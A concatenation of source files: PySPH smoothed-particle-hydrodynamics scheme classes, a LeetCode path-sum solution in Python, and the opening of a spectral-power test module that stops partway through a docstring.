integrator_cls : pysph.sph.integrator.Integrator
Integrator class to use, use sensible default if none is
passed.
extra_steppers : dict
Additional integration stepper instances as a dict.
**kw : extra arguments
Any additional keyword args are passed to the solver instance.
"""
from pysph.base.kernels import QuinticSpline
from pysph.sph.integrator_step import TransportVelocityStep
from pysph.sph.integrator import PECIntegrator
if kernel is None:
kernel = QuinticSpline(dim=self.dim)
steppers = {}
if extra_steppers is not None:
steppers.update(extra_steppers)
step_cls = TransportVelocityStep
for fluid in self.fluids:
if fluid not in steppers:
steppers[fluid] = step_cls()
cls = integrator_cls if integrator_cls is not None else PECIntegrator
integrator = cls(**steppers)
from pysph.solver.solver import Solver
self.solver = Solver(
dim=self.dim, integrator=integrator, kernel=kernel, **kw
)
def get_equations(self):
from pysph.sph.equation import Group
from pysph.sph.wc.transport_velocity import (
SummationDensity, StateEquation, MomentumEquationPressureGradient,
MomentumEquationArtificialViscosity,
MomentumEquationViscosity, MomentumEquationArtificialStress,
SolidWallPressureBC, SolidWallNoSlipBC, SetWallVelocity
)
equations = []
all = self.fluids + self.solids
g1 = []
for fluid in self.fluids:
g1.append(SummationDensity(dest=fluid, sources=all))
equations.append(Group(equations=g1, real=False))
g2 = []
for fluid in self.fluids:
g2.append(StateEquation(
dest=fluid, sources=None, p0=self.p0, rho0=self.rho0, b=1.0
))
for solid in self.solids:
g2.append(SetWallVelocity(dest=solid, sources=self.fluids))
if len(g2) > 0:
equations.append(Group(equations=g2, real=False))
g3 = []
for solid in self.solids:
g3.append(SolidWallPressureBC(
dest=solid, sources=self.fluids, b=1.0, rho0=self.rho0,
p0=self.p0, gx=self.gx, gy=self.gy, gz=self.gz
))
if len(g3) > 0:
equations.append(Group(equations=g3, real=False))
g4 = []
for fluid in self.fluids:
g4.append(
MomentumEquationPressureGradient(
dest=fluid, sources=all, pb=self.pb, gx=self.gx,
gy=self.gy, gz=self.gz, tdamp=self.tdamp
)
)
if self.alpha > 0.0:
g4.append(
MomentumEquationArtificialViscosity(
dest=fluid, sources=all, c0=self.c0,
alpha=self.alpha
)
)
if self.nu > 0.0:
g4.append(
MomentumEquationViscosity(
dest=fluid, sources=self.fluids, nu=self.nu
)
)
if len(self.solids) > 0:
g4.append(
SolidWallNoSlipBC(
dest=fluid, sources=self.solids, nu=self.nu
)
)
g4.append(
MomentumEquationArtificialStress(
dest=fluid, sources=self.fluids)
)
equations.append(Group(equations=g4))
return equations
def setup_properties(self, particles, clean=True):
from pysph.base.utils import get_particle_array_tvf_fluid, \
get_particle_array_tvf_solid
particle_arrays = dict([(p.name, p) for p in particles])
dummy = get_particle_array_tvf_fluid(name='junk')
props = list(dummy.properties.keys())
output_props = dummy.output_property_arrays
for fluid in self.fluids:
pa = particle_arrays[fluid]
self._ensure_properties(pa, props, clean)
pa.set_output_arrays(output_props)
dummy = get_particle_array_tvf_solid(name='junk')
props = list(dummy.properties.keys())
output_props = dummy.output_property_arrays
for solid in self.solids:
pa = particle_arrays[solid]
self._ensure_properties(pa, props, clean)
pa.set_output_arrays(output_props)
class AdamiHuAdamsScheme(TVFScheme):
"""This is a scheme similiar to that in the paper:
Adami, S., Hu, X., Adams, N. A generalized wall boundary condition for
smoothed particle hydrodynamics. Journal of Computational Physics
2012;231(21):7057-7075.
The major difference is in how the equations are integrated. The paper
has a different scheme that does not quite fit in with how things are done
in PySPH readily so we simply use the WCSPHStep which works well.
"""
def __init__(self, fluids, solids, dim, rho0, c0, nu, h0,
gx=0.0, gy=0.0, gz=0.0, p0=0.0, gamma=7.0,
tdamp=0.0, alpha=0.0):
self.fluids = fluids
self.solids = solids
self.solver = None
self.rho0 = rho0
self.c0 = c0
self.h0 = h0
self.p0 = p0
self.nu = nu
self.dim = dim
self.gx = gx
self.gy = gy
self.gz = gz
self.alpha = alpha
self.gamma = float(gamma)
self.tdamp = tdamp
self.attributes_changed()
def add_user_options(self, group):
super(AdamiHuAdamsScheme, self).add_user_options(group)
group.add_argument(
"--gamma", action="store", type=float, dest="gamma",
default=None,
help="Gamma for the state equation."
)
def attributes_changed(self):
self.B = self.c0*self.c0*self.rho0/self.gamma
def consume_user_options(self, options):
vars = ['alpha', 'tdamp', 'gamma']
data = dict((var, self._smart_getattr(options, var))
for var in vars)
self.configure(**data)
def configure_solver(self, kernel=None, integrator_cls=None,
extra_steppers=None, **kw):
"""Configure the solver to be generated.
Parameters
----------
kernel : Kernel instance.
Kernel to use, if none is passed a default one is used.
integrator_cls : pysph.sph.integrator.Integrator
Integrator class to use, use sensible default if none is
passed.
extra_steppers : dict
Additional integration stepper instances as a dict.
**kw : extra arguments
Any additional keyword args are passed to the solver instance.
"""
from pysph.base.kernels import QuinticSpline
from pysph.sph.integrator_step import WCSPHStep
from pysph.sph.integrator import PECIntegrator
if kernel is None:
kernel = QuinticSpline(dim=self.dim)
steppers = {}
if extra_steppers is not None:
steppers.update(extra_steppers)
step_cls = WCSPHStep
for fluid in self.fluids:
if fluid not in steppers:
steppers[fluid] = step_cls()
cls = integrator_cls if integrator_cls is not None else PECIntegrator
integrator = cls(**steppers)
from pysph.solver.solver import Solver
self.solver = Solver(
dim=self.dim, integrator=integrator, kernel=kernel, **kw
)
def get_equations(self):
from pysph.sph.equation import Group
from pysph.sph.wc.basic import TaitEOS
from pysph.sph.basic_equations import XSPHCorrection
from pysph.sph.wc.transport_velocity import (
ContinuityEquation, ContinuitySolid,
MomentumEquationPressureGradient,
MomentumEquationViscosity, MomentumEquationArtificialViscosity,
SolidWallPressureBC, SolidWallNoSlipBC, SetWallVelocity,
VolumeSummation
)
equations = []
all = self.fluids + self.solids
g2 = []
for fluid in self.fluids:
g2.append(VolumeSummation(dest=fluid, sources=all))
g2.append(TaitEOS(
dest=fluid, sources=None, rho0=self.rho0, c0=self.c0,
gamma=self.gamma, p0=self.p0
))
for solid in self.solids:
g2.append(VolumeSummation(dest=solid, sources=all))
g2.append(SetWallVelocity(dest=solid, sources=self.fluids))
equations.append(Group(equations=g2, real=False))
g3 = []
for solid in self.solids:
g3.append(SolidWallPressureBC(
dest=solid, sources=self.fluids, b=1.0, rho0=self.rho0,
p0=self.B, gx=self.gx, gy=self.gy, gz=self.gz
))
equations.append(Group(equations=g3, real=False))
g4 = []
for fluid in self.fluids:
g4.append(
ContinuityEquation(dest=fluid, sources=self.fluids)
)
if self.solids:
g4.append(
ContinuitySolid(dest=fluid, sources=self.solids)
)
g4.append(
MomentumEquationPressureGradient(
dest=fluid, sources=all, pb=0.0, gx=self.gx,
gy=self.gy, gz=self.gz, tdamp=self.tdamp
)
)
if self.alpha > 0.0:
g4.append(
MomentumEquationArtificialViscosity(
dest=fluid, sources=all, c0=self.c0,
alpha=self.alpha
)
)
if self.nu > 0.0:
g4.append(
MomentumEquationViscosity(
dest=fluid, sources=self.fluids, nu=self.nu
)
)
if len(self.solids) > 0:
g4.append(
SolidWallNoSlipBC(
dest=fluid, sources=self.solids, nu=self.nu
)
)
g4.append(XSPHCorrection(dest=fluid, sources=[fluid]))
equations.append(Group(equations=g4))
return equations
def setup_properties(self, particles, clean=True):
super(AdamiHuAdamsScheme, self).setup_properties(particles, clean)
particle_arrays = dict([(p.name, p) for p in particles])
props = ['cs', 'arho', 'rho0', 'u0', 'v0', 'w0', 'x0', 'y0', 'z0',
'ax', 'ay', 'az']
for fluid in self.fluids:
pa = particle_arrays[fluid]
for prop in props:
pa.add_property(prop)
class GasDScheme(Scheme):
def __init__(self, fluids, solids, dim, gamma, kernel_factor, alpha1=1.0,
alpha2=0.1, beta=2.0, adaptive_h_scheme='mpm',
update_alpha1=False, update_alpha2=False,
max_density_iterations=250,
density_iteration_tolerance=1e-3, has_ghosts=False):
"""
Parameters
----------
fluids: list
List of names of fluid particle arrays.
solids: list
List of names of solid particle arrays (or boundaries), currently
not supported
dim: int
Dimensionality of the problem.
gamma: float
Gamma for Equation of state.
kernel_factor: float
Kernel scaling factor.
alpha1: float
Artificial viscosity parameter.
alpha2: float
Artificial viscosity parameter.
beta: float
Artificial viscosity parameter.
adaptive_h_scheme: str
Adaptive h scheme to use. One of ['mpm', 'gsph']
update_alpha1: bool
Update the alpha1 parameter dynamically.
update_alpha2: bool
Update the alpha2 parameter dynamically.
max_density_iterations: int
Maximum number of iterations to run for one density step
density_iteration_tolerance: float
Maximum difference allowed in two successive density iterations
has_ghosts: bool
if ghost particles (either mirror or periodic) is used
"""
self.fluids = fluids
self.solids = solids
self.dim = dim
self.solver = None
self.gamma = gamma
self.alpha1 = alpha1
self.alpha2 = alpha2
self.update_alpha1 = update_alpha1
self.update_alpha2 = update_alpha2
self.beta = beta
self.kernel_factor = kernel_factor
self.adaptive_h_scheme = adaptive_h_scheme
self.density_iteration_tolerance = density_iteration_tolerance
self.max_density_iterations = max_density_iterations
self.has_ghosts = has_ghosts
def add_user_options(self, group):
choices = ['gsph', 'mpm']
group.add_argument(
"--adaptive-h", action="store", dest="adaptive_h_scheme",
default=None, choices=choices,
help="Specify scheme for adaptive smoothing lengths %s" % choices
)
group.add_argument(
"--alpha1", action="store", type=float, dest="alpha1",
default=None,
help="Alpha1 for the artificial viscosity."
)
group.add_argument(
"--beta", action="store", type=float, dest="beta",
default=None,
help="Beta for the artificial viscosity."
)
group.add_argument(
"--alpha2", action="store", type=float, dest="alpha2",
default=None,
help="Alpha2 for artificial viscosity"
)
group.add_argument(
"--gamma", action="store", type=float, dest="gamma",
default=None,
help="Gamma for the state equation."
)
add_bool_argument(
group, "update-alpha1", dest="update_alpha1",
help="Update the alpha1 parameter.",
default=None
)
add_bool_argument(
group, "update-alpha2", dest="update_alpha2",
help="Update the alpha2 parameter.",
default=None
)
def consume_user_options(self, options):
vars = ['gamma', 'alpha2', 'alpha1', 'beta', 'update_alpha1',
'update_alpha2', 'adaptive_h_scheme']
data = dict((var, self._smart_getattr(options, var))
for var in vars)
self.configure(**data)
def configure_solver(self, kernel=None, integrator_cls=None,
extra_steppers=None, **kw):
"""Configure the solver to be generated.
Parameters
----------
kernel : Kernel instance.
Kernel to use, if none is passed a default one is used.
integrator_cls : pysph.sph.integrator.Integrator
Integrator class to use, use sensible default if none is
passed.
extra_steppers : dict
Additional integration stepper instances as a dict.
**kw : extra arguments
Any additional keyword args are passed to the solver instance.
"""
from pysph.base.kernels import Gaussian
if kernel is None:
kernel = Gaussian(dim=self.dim)
steppers = {}
if extra_steppers is not None:
steppers.update(extra_steppers)
from pysph.sph.integrator import PECIntegrator
from pysph.sph.integrator_step import GasDFluidStep
cls = integrator_cls if integrator_cls is not None else PECIntegrator
step_cls = GasDFluidStep
for name in self.fluids:
if name not in steppers:
steppers[name] = step_cls()
integrator = cls(**steppers)
from pysph.solver.solver import Solver
self.solver = Solver(
dim=self.dim, integrator=integrator, kernel=kernel, **kw
)
def get_equations(self):
from pysph.sph.equation import Group
from pysph.sph.gas_dynamics.basic import (
ScaleSmoothingLength, UpdateSmoothingLengthFromVolume,
SummationDensity, IdealGasEOS, MPMAccelerations,
MPMUpdateGhostProps
)
from pysph.sph.gas_dynamics.boundary_equations import WallBoundary
equations = []
# Find the optimal 'h'
if self.adaptive_h_scheme == 'mpm':
g1 = []
for fluid in self.fluids:
g1.append(
SummationDensity(
dest=fluid, sources=self.fluids, k=self.kernel_factor,
density_iterations=True, dim=self.dim,
htol=self.density_iteration_tolerance
)
)
equations.append(Group(
equations=g1, update_nnps=True, iterate=True,
max_iterations=self.max_density_iterations
))
elif self.adaptive_h_scheme == 'gsph':
group = []
for fluid in self.fluids:
group.append(
ScaleSmoothingLength(dest=fluid, sources=None, factor=2.0)
)
equations.append(Group(equations=group, update_nnps=True))
group = []
for fluid in self.fluids:
group.append(
SummationDensity(
dest=fluid, sources=self.fluids, dim=self.dim
)
)
equations.append(Group(equations=group, update_nnps=False))
group = []
for fluid in self.fluids:
group.append(
UpdateSmoothingLengthFromVolume(
dest=fluid, sources=None, k=self.kernel_factor,
dim=self.dim
)
)
equations.append(Group(equations=group, update_nnps=True))
group = []
for fluid in self.fluids:
group.append(
SummationDensity(
dest=fluid, sources=self.fluids, dim=self.dim
)
)
equations.append(Group(equations=group, update_nnps=False))
# Done with finding the optimal 'h'
g2 = []
for fluid in self.fluids:
g2.append(IdealGasEOS(dest=fluid, sources=None, gamma=self.gamma))
equations.append(Group(equations=g2))
g3 = []
for solid in self.solids:
g3.append(WallBoundary(solid, sources=self.fluids))
equations.append(Group(equations=g3))
if self.has_ghosts:
gh = []
for fluid in self.fluids:
gh.append(
MPMUpdateGhostProps(dest=fluid, sources=None)
)
equations.append(Group(equations=gh, real=False))
g4 = []
for fluid in self.fluids:
g4.append(MPMAccelerations(
dest=fluid, sources=self.fluids + self.solids,
alpha1_min=self.alpha1,
alpha2_min=self.alpha2, beta=self.beta,
update_alpha1=self.update_alpha1,
update_alpha2=self.update_alpha2
))
equations.append(Group(equations=g4))
return equations
def setup_properties(self, particles, clean=True):
from pysph.base.utils import get_particle_array_gasd
import numpy
particle_arrays = dict([(p.name, p) for p in particles])
dummy = get_particle_array_gasd(name='junk')
props = list(dummy.properties.keys())
output_props = dummy.output_property_arrays
for fluid in self.fluids:
pa = particle_arrays[fluid]
self._ensure_properties(pa, props, clean)
pa.add_property('orig_idx', type='int')
nfp = pa.get_number_of_particles()
pa.orig_idx[:] = numpy.arange(nfp)
pa.set_output_arrays(output_props)
solid_props = set(props) | set('div cs wij htmp'.split(' '))
for solid in self.solids:
pa = particle_arrays[solid]
self._ensure_properties(pa, solid_props, clean)
pa.set_output_arrays(output_props)
class GSPHScheme(Scheme):
def __init__(self, fluids, solids, dim, gamma, kernel_factor, g1=0.0,
g2=0.0, rsolver=2, interpolation=1, monotonicity=1,
interface_zero=True, hybrid=False, blend_alpha=5.0, tf=1.0,
niter=20, tol=1e-6, has_ghosts=False):
"""
Parameters
----------
fluids: list
List of names of fluid particle arrays.
solids: list
List of names of solid particle arrays (or boundaries), currently
not supported
dim: int
Dimensionality of the problem.
gamma: float
Gamma for Equation of state.
kernel_factor: float
Kernel scaling factor.
g1, g2 : double
ADKE style thermal conduction parameters
rsolver: int
Riemann solver to use. See pysph.sph.gas_dynamics.gsph for
valid options.
interpolation: int
Kind of interpolation for the specific volume integrals.
monotonicity : int
Type of monotonicity algorithm to use:
0 : First order GSPH
1 : I02 algorithm # https://doi.org/10.1006/jcph.2002.7053
2 : IwIn algorithm # https://doi.org/10.1111/j.1365-2966.2011.19588.x # noqa: E501
interface_zero : bool
Set Interface position s^*_{ij} = 0 for the Riemann problem.
hybrid, blend_alpha : bool, double
Hybrid scheme and blending alpha value
tf: double
Final time used for blending.
niter: int
Max number of iterations for iterative Riemann solvers.
tol: double
Tolerance for iterative Riemann solvers.
has_ghosts: bool
if ghost particles (either mirror or periodic) is used
"""
self.fluids = fluids
self.solids = solids
self.dim = dim
self.solver = None
self.gamma = gamma
self.kernel_factor = kernel_factor
self.g1 = g1
self.g2 = g2
self.rsolver = rsolver
self.interpolation = interpolation
self.monotonicity = monotonicity
self.interface_zero = interface_zero
self.hybrid = hybrid
self.blend_alpha = blend_alpha
self.tf = tf
self.niter = niter
self.tol = tol
self.has_ghosts = has_ghosts
self.rsolver_choices = {'non_diffusive': 0,
'van_leer': 1,
'exact': 2,
'hllc': 3,
'ducowicz': 4,
'hlle': 5,
'roe': 6,
'llxf': 7,
'hllc_ball': 8,
'hll_ball': 9,
'hllsy': 10}
self.interpolation_choices = {'delta': 0,
'linear': 1,
'cubic': 2}
self.monotonicity_choices = {'first_order': 0,
'i02': 1,
'iwin': 2}
def add_user_options(self, group):
group.add_argument(
"--rsolver", action="store", type=str, dest="rsolver",
default=None, choices=set(self.rsolver_choices.keys()),
help=f"Riemann solver to use, one of :"
f"{set(self.rsolver_choices.keys())}"
)
group.add_argument(
"--interpolation", action="store", type=str, dest="interpolation",
default=None, choices=set(self.interpolation_choices.keys()),
help=f"Interpolation algorithm to use, one of :"
f"{set(self.interpolation_choices.keys())}"
)
group.add_argument(
"--monotonicity", action="store", type=str, dest="monotonicity",
default=None, choices=set(self.monotonicity_choices.keys()),
help=f"Monotonicity algorithm to use, one of :"
f"{set(self.monotonicity_choices.keys())}"
)
group.add_argument(
"--g1", action="store", type=float, dest="g1",
default=None,
help="ADKE style thermal conduction parameter."
)
group.add_argument(
"--g2", action="store", type=float, dest="g2",
default=None,
help="ADKE style thermal conduction parameter."
)
group.add_argument(
"--gamma", action="store", type=float, dest="gamma",
default=None,
help="Gamma for the state equation."
)
group.add_argument(
"--blend-alpha", action="store", type=float, dest="blend_alpha",
default=None,
help="Blending factor for hybrid scheme."
)
add_bool_argument(
group, "interface-zero", dest="interface_zero",
help="Set interface position to zero for Riemann problem.",
default=None
)
add_bool_argument(
group, "hybrid", dest="hybrid",
help="Use the hybrid scheme.",
default=None
)
def consume_user_options(self, options):
vars = ['gamma', 'g1', 'g2', 'interface_zero',
'hybrid', 'blend_alpha']
data = dict((var, self._smart_getattr(options, var))
for var in vars)
map_vars = ['monotonicity', 'rsolver', 'interpolation']
for var in map_vars:
data[var] = self._smart_getattr_mapped(options, var)
self.configure(**data)
def _smart_getattr_mapped(self, obj, var):
res = getattr(obj, var)
if res is None:
return getattr(self, var)
else:
choices = getattr(self, f'{var}_choices')
return choices[res]
def configure_solver(self, kernel=None, integrator_cls=None,
extra_steppers=None, **kw):
"""Configure the solver to be generated.
Parameters
----------
kernel : Kernel instance.
Kernel to use, if none is passed a default one is used.
integrator_cls : pysph.sph.integrator.Integrator
Integrator class to use, use sensible default if none is
passed.
extra_steppers : dict
Additional integration stepper instances as a dict.
**kw : extra arguments
Any additional keyword args are passed to the solver instance.
"""
from pysph.base.kernels import Gaussian
if kernel is None:
kernel = Gaussian(dim=self.dim)
steppers = {}
if extra_steppers is not None:
steppers.update(extra_steppers)
from pysph.sph.integrator import EulerIntegrator
from pysph.sph.integrator_step import GSPHStep
cls = integrator_cls if integrator_cls is not None else EulerIntegrator
step_cls = GSPHStep
for name in self.fluids:
if name not in steppers:
steppers[name] = step_cls()
integrator = cls(**steppers)
from pysph.solver.solver import Solver
self.solver = Solver(
dim=self.dim, integrator=integrator, kernel=kernel, **kw
)
if 'tf' in kw:
self.tf = kw['tf']
def get_equations(self):
from pysph.sph.equation import Group
from pysph.sph.gas_dynamics.basic import (
ScaleSmoothingLength, UpdateSmoothingLengthFromVolume,
SummationDensity, IdealGasEOS
)
from pysph.sph.gas_dynamics.boundary_equations import WallBoundary
from pysph.sph.gas_dynamics.gsph import (
GSPHGradients, GSPHAcceleration, GSPHUpdateGhostProps
)
equations = []
# Find the optimal 'h'
group = []
for fluid in self.fluids:
group.append(
ScaleSmoothingLength(dest=fluid, sources=None, factor=2.0)
)
equations.append(Group(equations=group, update_nnps=True))
if self.solids:
group = []
for solid in self.solids:
group.append(WallBoundary(solid, sources=self.fluids))
equations.append(Group(equations=group))
all_pa = self.fluids + self.solids
group = []
for fluid in self.fluids:
group.append(
SummationDensity(
dest=fluid, sources=all_pa, dim=self.dim
)
)
equations.append(Group(equations=group, update_nnps=False))
if self.solids:
group = []
for solid in self.solids:
group.append(WallBoundary(solid, sources=self.fluids))
equations.append(Group(equations=group))
group = []
for fluid in self.fluids:
group.append(
UpdateSmoothingLengthFromVolume(
dest=fluid, sources=None, k=self.kernel_factor,
dim=self.dim
)
)
equations.append(Group(equations=group, update_nnps=True))
group = []
for fluid in self.fluids:
group.append(
SummationDensity(
dest=fluid, sources=all_pa, dim=self.dim
)
)
equations.append(Group(equations=group, update_nnps=False))
# Done with finding the optimal 'h'
group = []
for fluid in self.fluids:
group.append(IdealGasEOS(dest=fluid, sources=None,
gamma=self.gamma))
equations.append(Group(equations=group))
if self.solids:
group = []
for solid in self.solids:
group.append(WallBoundary(solid, sources=self.fluids))
equations.append(Group(equations=group))
g2 = []
for fluid in self.fluids:
g2.append(GSPHGradients(dest=fluid, sources=all_pa))
equations.append(Group(equations=g2))
if self.has_ghosts:
g3 = []
for fluid in self.fluids:
g3.append(GSPHUpdateGhostProps(dest=fluid, sources=None))
equations.append(Group(
equations=g3, update_nnps=False, real=False
))
g4 = []
for fluid in self.fluids:
g4.append(GSPHAcceleration(
dest=fluid, sources=all_pa, g1=self.g1,
g2=self.g2, monotonicity=self.monotonicity,
rsolver=self.rsolver, interpolation=self.interpolation,
interface_zero=self.interface_zero,
hybrid=self.hybrid, blend_alpha=self.blend_alpha,
gamma=self.gamma, niter=self.niter, tol=self.tol
))
equations.append(Group(equations=g4))
return equations
def setup_properties(self, particles, clean=True):
from pysph.base.utils import get_particle_array_gasd
import numpy
particle_arrays = dict([(p.name, p) for p in particles])
dummy = get_particle_array_gasd(name='junk')
props = (list(dummy.properties.keys()) +
'px py pz ux uy uz vx vy vz wx wy wz'.split())
output_props = dummy.output_property_arrays
for fluid in self.fluids:
pa = particle_arrays[fluid]
self._ensure_properties(pa, props, clean)
pa.add_property('orig_idx', type='int')
nfp = pa.get_number_of_particles()
pa.orig_idx[:] = numpy.arange(nfp)
pa.set_output_arrays(output_props)
solid_props = set(props) | set(('wij', 'htmp'))
for solid in self.solids:
pa = particle_arrays[solid]
self._ensure_properties(pa, solid_props, clean)
pa.set_output_arrays(output_props)
class ADKEScheme(Scheme):
def __init__(self, fluids, solids, dim, gamma=1.4, alpha=1.0, beta=2.0,
k=1.0, eps=0.0, g1=0, g2=0, has_ghosts=False):
"""
Parameters
----------
fluids: list
a list with names of fluid particle arrays
solids: list
a list with names of solid (or boundary) particle arrays
dim: int
dimensionality of the problem
gamma: double
Gamma for equation of state
alpha: double
artificial viscosity parameter
beta: double
artificial viscosity parameter
k: double
kernel scaling parameter
eps: double
kernel scaling parameter
g1: double
artificial heat conduction parameter
g2: double
artificial heat conduction parameter
has_ghosts: bool
if problem uses ghost particles (periodic or mirror)
"""
self.fluids = fluids
self.solids = solids
self.dim = dim
self.solver = None
self.gamma = gamma
self.alpha = alpha
self.beta = beta
self.k = k
self.eps = eps
self.g1 = g1
self.g2 = g2
self.has_ghosts = has_ghosts
def get_equations(self):
from pysph.sph.equation import Group
from pysph.sph.basic_equations import SummationDensity
from pysph.sph.gas_dynamics.basic import (
IdealGasEOS, ADKEAccelerations, SummationDensityADKE,
ADKEUpdateGhostProps
)
from pysph.sph.gas_dynamics.boundary_equations import WallBoundary
equations = []
if self.solids:
g1 = []
for solid in self.solids:
g1.append(WallBoundary(solid, sources=self.fluids))
equations.append(Group(equations=g1))
g2 = []
for fluid in self.fluids:
g2.append(
SummationDensityADKE(
fluid, sources=self.fluids + self.solids, k=self.k,
eps=self.eps
)
)
equations.append(Group(g2, update_nnps=False, iterate=False))
if self.solids:
g3 = []
for solid in self.solids:
g3.append(WallBoundary(solid, sources=self.fluids))
equations.append(Group(equations=g3))
g4 = []
for fluid in self.fluids:
g4.append(SummationDensity(fluid, self.fluids+self.solids))
equations.append(Group(g4, update_nnps=True))
if self.solids:
g5 = []
for solid in self.solids:
g5.append(WallBoundary(solid, sources=self.fluids))
equations.append(Group(equations=g5))
g6 = []
for elem in self.fluids+self.solids:
g6.append(IdealGasEOS(elem, sources=None, gamma=self.gamma))
equations.append(Group(equations=g6))
if self.has_ghosts:
gh = []
for fluid in self.fluids:
gh.append(
ADKEUpdateGhostProps(dest=fluid, sources=None)
)
equations.append(Group(equations=gh, real=False))
g7 = []
for fluid in self.fluids:
g7.append(
ADKEAccelerations(
dest=fluid, sources=self.fluids + self.solids,
alpha=self.alpha, beta=self.beta, g1=self.g1, g2=self.g2,
k=self.k, eps=self.eps
)
)
equations.append(Group(equations=g7))
return equations
def configure_solver(self, kernel=None, integrator_cls=None,
extra_steppers=None, **kw):
"""Configure the solver to be generated.
Parameters
----------
kernel : Kernel instance.
Kernel to use, if none is passed a default one is used.
integrator_cls : pysph.sph.integrator.Integrator
Integrator class to use, use sensible default if none is
passed.
extra_steppers : dict
Additional integration stepper instances as a dict.
**kw : extra arguments
Any additional keyword args are passed to the solver instance.
"""
from pysph.base.kernels import Gaussian
if kernel is None:
kernel = Gaussian(dim=self.dim)
steppers = {}
if extra_steppers is not None:
steppers.update(extra_steppers)
from pysph.sph.integrator import PECIntegrator
from pysph.sph.integrator_step import ADKEStep
cls = integrator_cls if integrator_cls is not None else PECIntegrator
step_cls = ADKEStep
for name in self.fluids:
if name not in steppers:
steppers[name] = step_cls()
integrator = cls(**steppers)
from pysph.solver.solver import Solver
self.solver = Solver(
dim=self.dim, integrator=integrator, kernel=kernel, **kw
)
def setup_properties(self, particles, clean=True):
from pysph.base.utils import get_particle_array
import numpy
particle_arrays = dict([(p.name, p) for p in particles])
required_props = [
'x', 'y', 'z', 'u', 'v', 'w', 'rho', 'h', 'm', 'cs', 'p',
'e', 'au', 'av', 'aw', 'arho', 'ae', 'am', 'ah', 'x0', 'y0',
'z0', 'u0', 'v0', 'w0', 'rho0', 'e0', 'h0', 'div', 'h0',
'wij', 'htmp', 'logrho']
dummy = get_particle_array(additional_props=required_props,
name='junk')
dummy.set_output_arrays(
['x', 'y', 'u', 'v', 'rho', 'm', 'h',
'cs', 'p', 'e', 'au', 'av', 'ae', 'pid', 'gid', 'tag']
)
props = list(dummy.properties.keys())
output_props = dummy.output_property_arrays
for solid in self.solids:
pa = particle_arrays[solid]
self._ensure_properties(pa, props, clean)
pa.set_output_arrays(output_props)
for fluid in self.fluids:
pa = particle_arrays[fluid]
self._ensure_properties(pa, props, clean)
pa.add_property('orig_idx', type='int')
nfp = pa.get_number_of_particles()
pa.orig_idx[:] = numpy.arange(nfp)
pa.set_output_arrays(output_props)
| pypr/pysph | pysph/sph/scheme.py | scheme.py | py | 58,703 | python | en | code | 390 | github-code | 90 |
25251083629 | # coding: utf8
"""
---------------------------------------------
File Name: 112-path-sum
Description:
Author: wangdawei
date: 2018/4/25
---------------------------------------------
Change Activity:
2018/4/25
---------------------------------------------
"""
# Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
import collections
# bfs iterate
class Solution:
def buildTree(self, preorder, inorder):
"""
:type preorder: List[int]
:type inorder: List[int]
:rtype: TreeNode
"""
# print(preorder, inorder)
if len(preorder) == 0 and len(inorder) == 0:
return None
if len(preorder) == 1 and len(inorder) == 1:
return TreeNode(preorder[0])
root = TreeNode(preorder[0])
ind = inorder.index(preorder[0])
inorderleft = inorder[0:ind]
preorderleft = preorder[1:1+ind]
root.left = self.buildTree(preorderleft, inorderleft)
inorderright = inorder[ind+1:]
preorderright = preorder[ind+1:]
root.right = self.buildTree(preorderright, inorderright)
return root
def hasPathSumLevelone(self, root, sum):
"""
:type root: TreeNode
:rtype: int
"""
if not root:
return False
queue = [[(root, root.val)]]
level = 0
while True:
temp = []
for node, cumu in queue[level]:
if node.left is None and node.right is None and cumu==sum:
return True
if node.left:
temp.append((node.left, cumu+node.left.val))
if node.right:
temp.append((node.right, cumu+node.right.val))
if not temp:
break
queue.append(temp)
level += 1
return False
def hasPathSum(self, root, sum):
"""
:type root: TreeNode
:rtype: int
"""
if not root:
return False
queue = collections.deque()
queue.append((root, root.val))
while queue:
node, cumu = queue.popleft()
if node.left is None and node.right is None and cumu==sum:
return True
if node.left:
queue.append((node.left, cumu+node.left.val))
if node.right:
queue.append((node.right, cumu+node.right.val))
return False
# dfs iterate
class Solution:
def buildTree(self, preorder, inorder):
"""
:type preorder: List[int]
:type inorder: List[int]
:rtype: TreeNode
"""
# print(preorder, inorder)
if len(preorder) == 0 and len(inorder) == 0:
return None
if len(preorder) == 1 and len(inorder) == 1:
return TreeNode(preorder[0])
root = TreeNode(preorder[0])
ind = inorder.index(preorder[0])
inorderleft = inorder[0:ind]
preorderleft = preorder[1:1+ind]
root.left = self.buildTree(preorderleft, inorderleft)
inorderright = inorder[ind+1:]
preorderright = preorder[ind+1:]
root.right = self.buildTree(preorderright, inorderright)
return root
def hasPathSum(self, root, sum):
if not root:
return False
stack = []
cumu = 0
while True:
while root:
cumu += root.val
stack.append((root, cumu))
root = root.left
if not stack:
break
node, cumu = stack.pop()
# print(node.val, cumu)
if node.left is None and node.right is None:
if sum == cumu:
return True
root = node.right
return False
solu = Solution()
root2 = TreeNode(3)
root2.left = TreeNode(9)
root2.right = TreeNode(20)
root2.right.left = TreeNode(15)
root2.right.right = TreeNode(7)
print("#"*30)
print(solu.hasPathSum(root2, 12))
print("#"*30)
print(solu.hasPathSum(root2, 30))
print("#"*30)
print(solu.hasPathSum(root2, 38))
print("#"*30)
print(solu.hasPathSum(root2, 37)) | sevenseablue/leetcode | src/leet/112-path-sum.py | 112-path-sum.py | py | 4,279 | python | en | code | 0 | github-code | 90 |
21716735512 | """
Suite of tests to assess "face validity" of spectral analysis functions in spectra.py
Usually used to test new or majorly updated functions.
Includes tests that parametrically estimate power as a function of frequency, amplitude, phase,
n, etc. to establish methods produce expected pattern of results.
Plots results and runs assertions that basic expected results are reproduced
Functions
---------
- test_power : Contains tests of spectral estimation functions
- power_test_battery : Runs standard battery of tests of spectral estimation functions
- itpc_test_battery : Runs standard battery of tests of ITPC estimation functions
"""
import os
import time
from warnings import warn
from math import pi, sqrt, ceil, floor, log2
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import bernoulli
from spynal.spectra.spectra import power_spectrogram, itpc
from spynal.spectra.utils import simulate_oscillation
def test_power(method, test='frequency', test_values=None, spec_type='power',
do_tests=True, do_plots=False, plot_dir=None, seed=1,
amp=5.0, freq=32, phi=0, phi_sd=0, noise=0.5, n=1000, burst_rate=0,
time_range=3.0, smp_rate=1000, spikes=False, **kwargs):
"""
Basic testing for functions estimating time-frequency spectral power
Generate synthetic LFP data using given network simulation,
estimate spectrogram using given function, and compares estimated to expected.
For test failures, raises an error or warning (depending on value of `do_tests`).
Optionally plots summary of test results.
Parameters
----------
method : str
Name of time-frequency spectral estimation function to test. Options:
